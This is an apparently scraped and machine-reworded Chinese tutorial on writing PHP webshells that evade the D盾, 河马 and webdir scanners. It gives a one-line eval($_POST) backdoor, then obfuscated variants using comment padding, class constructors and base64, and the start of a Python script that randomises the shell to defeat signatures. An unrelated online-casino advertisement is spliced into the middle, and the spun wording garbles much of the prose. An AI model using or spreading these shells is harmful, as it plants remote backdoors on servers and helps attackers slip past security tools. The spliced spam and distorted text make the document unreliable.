电银付安装教程（dianyinzhifu.com）：行使注释及自定义加密免杀Webshell

- 0x00：简介-

此篇只讨论php，实在原理是相同的，本文的思绪依然适用于其他语言
由于php7.1以后assert不能拆分了，以是此篇不使用assert函数作为焦点，使用适用性更广的eval。

免杀顺序依次为D盾 河马 webdir
0x01：探讨免杀

免杀D盾
首先我们需要领会免杀的原理，免杀实在就是绕过杀软的规则，而规则对我们来说是不透明的，然则可以凭据fuzz探知个也许。

首先请出我们的一句话木马：

<?php @eval($_POST('a'));?> 

无论若何混淆webshell，我们期望最终获得的逻辑依然是这条代码，以是谜底知道了，想办法混淆就行了。

经由对D盾的探测，可以知道，它对函数的检测实在是对照粗拙的，好比我们组织一个函数，让其返回值拼接为

eval($_POST['a']) 

<?php function x() { return $_POST['a']; } eval(x()); ?> 

D盾扫一下

被杀了，显然D盾并没有给出我们为什么这个会被杀，只说是已知后门，这里我们测试一下到底是什么器械被规则杀掉了。

欧博开户

欢迎进入欧博开户平台（Allbet Game）:www.aLLbetgame.us，欧博开户平台开放欧博Allbet开户、欧博Allbet代理开户、欧博Allbet电脑客户端、欧博AllbetAPP下载等业务。

首先，无论若何更改函数名，都市被杀掉，以是和函数名没关系，然后就是eval内的参数了，测试后发现，只要拼接成eval($_POST['a'])就会被杀，因此我们制止语句直接拼接为这样即可。

若何制止直接拼接呢 固然是往中心加料了 加一些既不会损坏语法又能起到隔离作用的器械，什么器械可以做到这样呢？固然就是注释了

好比这样的：

<?php function x() { return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/"; } eval(x()); ?> 

这里用两段注释在"eval("与"$_POST"之间起到了隔离的作用，因此绕过了直接拼接这个规则，D盾继续杀一下

已经免杀乐成，再看一下能否使用

既然如此，我们的焦点绕过思绪就是行使注释了，为了去除特征，必不可少的就是随机性了

使用函数返回值与eval拼接只是权宜之计，究竟也是一条规则就能够被干掉的。

以是我们这里使用类和组织函数来替换自动挪用函数，

<?php class x { function __construct() { @eval("/*sasas23123*/".$_POST['a']."/*sdfw3123*/"); } } new x(); ?> 

改到这里，我不禁想 若是D盾发狠把".$_POST['a']."当自力规则，那岂不是也歇菜，以是，我决议使用base64编码将"$_POST['a']"转化一下

<?php class x { public $payload = null; public $decode_payload = null; function __construct() { $this->payload='ZXZhbCgkX1BPU1RbYV0pOw=='; $this->decode_payload = @base64_decode( $this->payload ); @eval("/*sasas23123*/".$this->decode_payload."/*sdfw3123*/"); } } new x(); ?> 

到现在为止，模板确认

后面就是写轮子了，至于轮子原理也很简单，就是将可以修改特征的参数名使用随机数填充，好比类名、public变量名、用于混淆的注释字符等。
代码如下：

import random ，author: pureqh ，github: https://github.com/pureqh/webshell shell = '''<?php class {0}{3}  public ${1} = null;  public ${2} = null;  function __construct(){3}  $this->{1}='ZXZhbCgkX1BPU1RbYV0pOw==';  $this->{2} = @base64_decode( $this->{1} );  @eval({5}.$this->{2}.{5});  {4}{4} new {0}(); ?>'''